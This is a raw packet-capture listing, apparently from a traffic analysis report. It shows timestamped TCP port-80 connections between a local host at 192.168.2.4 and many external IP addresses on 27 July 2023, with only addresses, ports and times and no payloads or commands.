                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274259090 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274301052 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274301052 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274736881 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274789095 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274853945 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274902105 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274910927 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274910927 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274940014 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.274949074 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.275265932 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.275748014 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.275821924 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.275867939 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.275923967 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.275963068 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276367903 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276438951 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276493073 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276540041 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276583910 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276643038 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.276686907 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277256966 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277306080 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277374029 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277435064 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277443886 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277456999 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277517080 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.277575016 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278178930 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278228045 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278273106 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278321028 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278366089 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278373957 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278403997 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.278491974 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279402018 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279452085 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279500008 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279545069 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279562950 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279592991 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279697895 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279697895 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.279892921 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.285734892 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.285790920 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.285948992 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286113977 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286142111 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286189079 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286236048 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286281109 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286319017 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286325932 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286355019 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286371946 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286410093 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.286436081 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287009001 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287059069 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287105083 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287149906 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287194967 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287244081 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287244081 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.287244081 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288057089 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288104057 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288150072 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288192987 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288216114 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288238049 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288249016 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288367033 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288837910 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288883924 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.288975000 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289021969 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289022923 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289021969 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289068937 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289099932 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289099932 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289139986 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289762020 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289823055 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289880991 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289927959 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289952040 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289978027 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289978027 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.289999962 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290025949 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290605068 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290721893 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290728092 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290777922 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290786982 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290857077 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290915966 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290923119 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.290962934 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291085958 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291611910 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291675091 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291682959 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291735888 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291743994 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291781902 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291784048 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291829109 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.291892052 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292603016 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292650938 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292695999 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292740107 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292792082 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292813063 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292813063 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.292915106 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293380976 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293423891 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293467045 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293509007 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293548107 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293586969 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.293612957 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.294260979 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.294301033 CEST8050021104.26.10.81192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.294470072 CEST5002180192.168.2.4104.26.10.81
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.324963093 CEST8049928157.112.182.239192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.325164080 CEST4992880192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.345297098 CEST8050024103.224.212.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.345477104 CEST5002480192.168.2.4103.224.212.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.345916033 CEST5002480192.168.2.4103.224.212.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.414671898 CEST5002580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.428212881 CEST804992693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.429503918 CEST4992680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.476010084 CEST4975980192.168.2.493.187.206.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.476753950 CEST5002680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.479089975 CEST4976180192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.479779959 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.484606028 CEST8049979217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.484714031 CEST4997980192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.495224953 CEST804997766.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.495548010 CEST4997780192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.496030092 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.496148109 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.502721071 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.518949986 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.528963089 CEST8049761104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.529067993 CEST4976180192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.538655996 CEST805002572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.539448023 CEST5002580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.543734074 CEST5002580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.549534082 CEST8050024103.224.212.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.549592972 CEST8050024103.224.212.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.550028086 CEST5002480192.168.2.4103.224.212.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.550602913 CEST5002480192.168.2.4103.224.212.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.555259943 CEST5000280192.168.2.4195.78.66.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.563829899 CEST804975993.187.206.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.564088106 CEST805002693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.565567970 CEST5002680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.586616993 CEST5002680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.595663071 CEST8049972108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.595762014 CEST4997280192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.664429903 CEST804997539.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.664544106 CEST4997580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.665306091 CEST5002880192.168.2.464.125.133.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.667433977 CEST805002572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.668857098 CEST805002572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.668886900 CEST805002572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.668942928 CEST5002580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.668942928 CEST5002580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.674393892 CEST805002693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.674551964 CEST805002693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.674635887 CEST5002680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.717638969 CEST8050024103.224.212.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.834610939 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.834659100 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.834762096 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.838836908 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.859217882 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.875510931 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.933474064 CEST5003080192.168.2.496.91.204.114
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.982089043 CEST8050029104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.984055042 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.984843016 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.032432079 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.032494068 CEST8050027104.26.3.124192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.032541037 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.032609940 CEST5002780192.168.2.4104.26.3.124
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.128093958 CEST8050029104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.128423929 CEST8050029104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.128537893 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.156944036 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.225047112 CEST5003180192.168.2.4210.140.73.39
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.300348997 CEST8050029104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.300843954 CEST8050029104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.300980091 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.420151949 CEST5003280192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.457417011 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.473969936 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.476644039 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.476821899 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.478020906 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.493629932 CEST80500343.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.493819952 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.494575977 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.497338057 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.514132023 CEST80500343.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.514745951 CEST80500343.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.514904976 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.518565893 CEST8049989122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.518714905 CEST4998980192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.545388937 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.546503067 CEST805003266.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.549657106 CEST5003280192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.550534964 CEST5003280192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.552664995 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.552725077 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.552778959 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.552817106 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.552865028 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.552920103 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.565521002 CEST80500343.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.566135883 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.576603889 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580483913 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580549955 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580600977 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580688000 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580698967 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580739021 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580773115 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580801010 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580840111 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580899954 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.580996037 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.581088066 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.581165075 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.581233025 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.581321001 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.581378937 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.581636906 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.586580992 CEST5001780192.168.2.4198.100.146.220
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.596755028 CEST80500343.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.596848011 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.597902060 CEST5003480192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.601387024 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.601438046 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.601485968 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.601567030 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.601567030 CEST5003380192.168.2.462.75.216.137
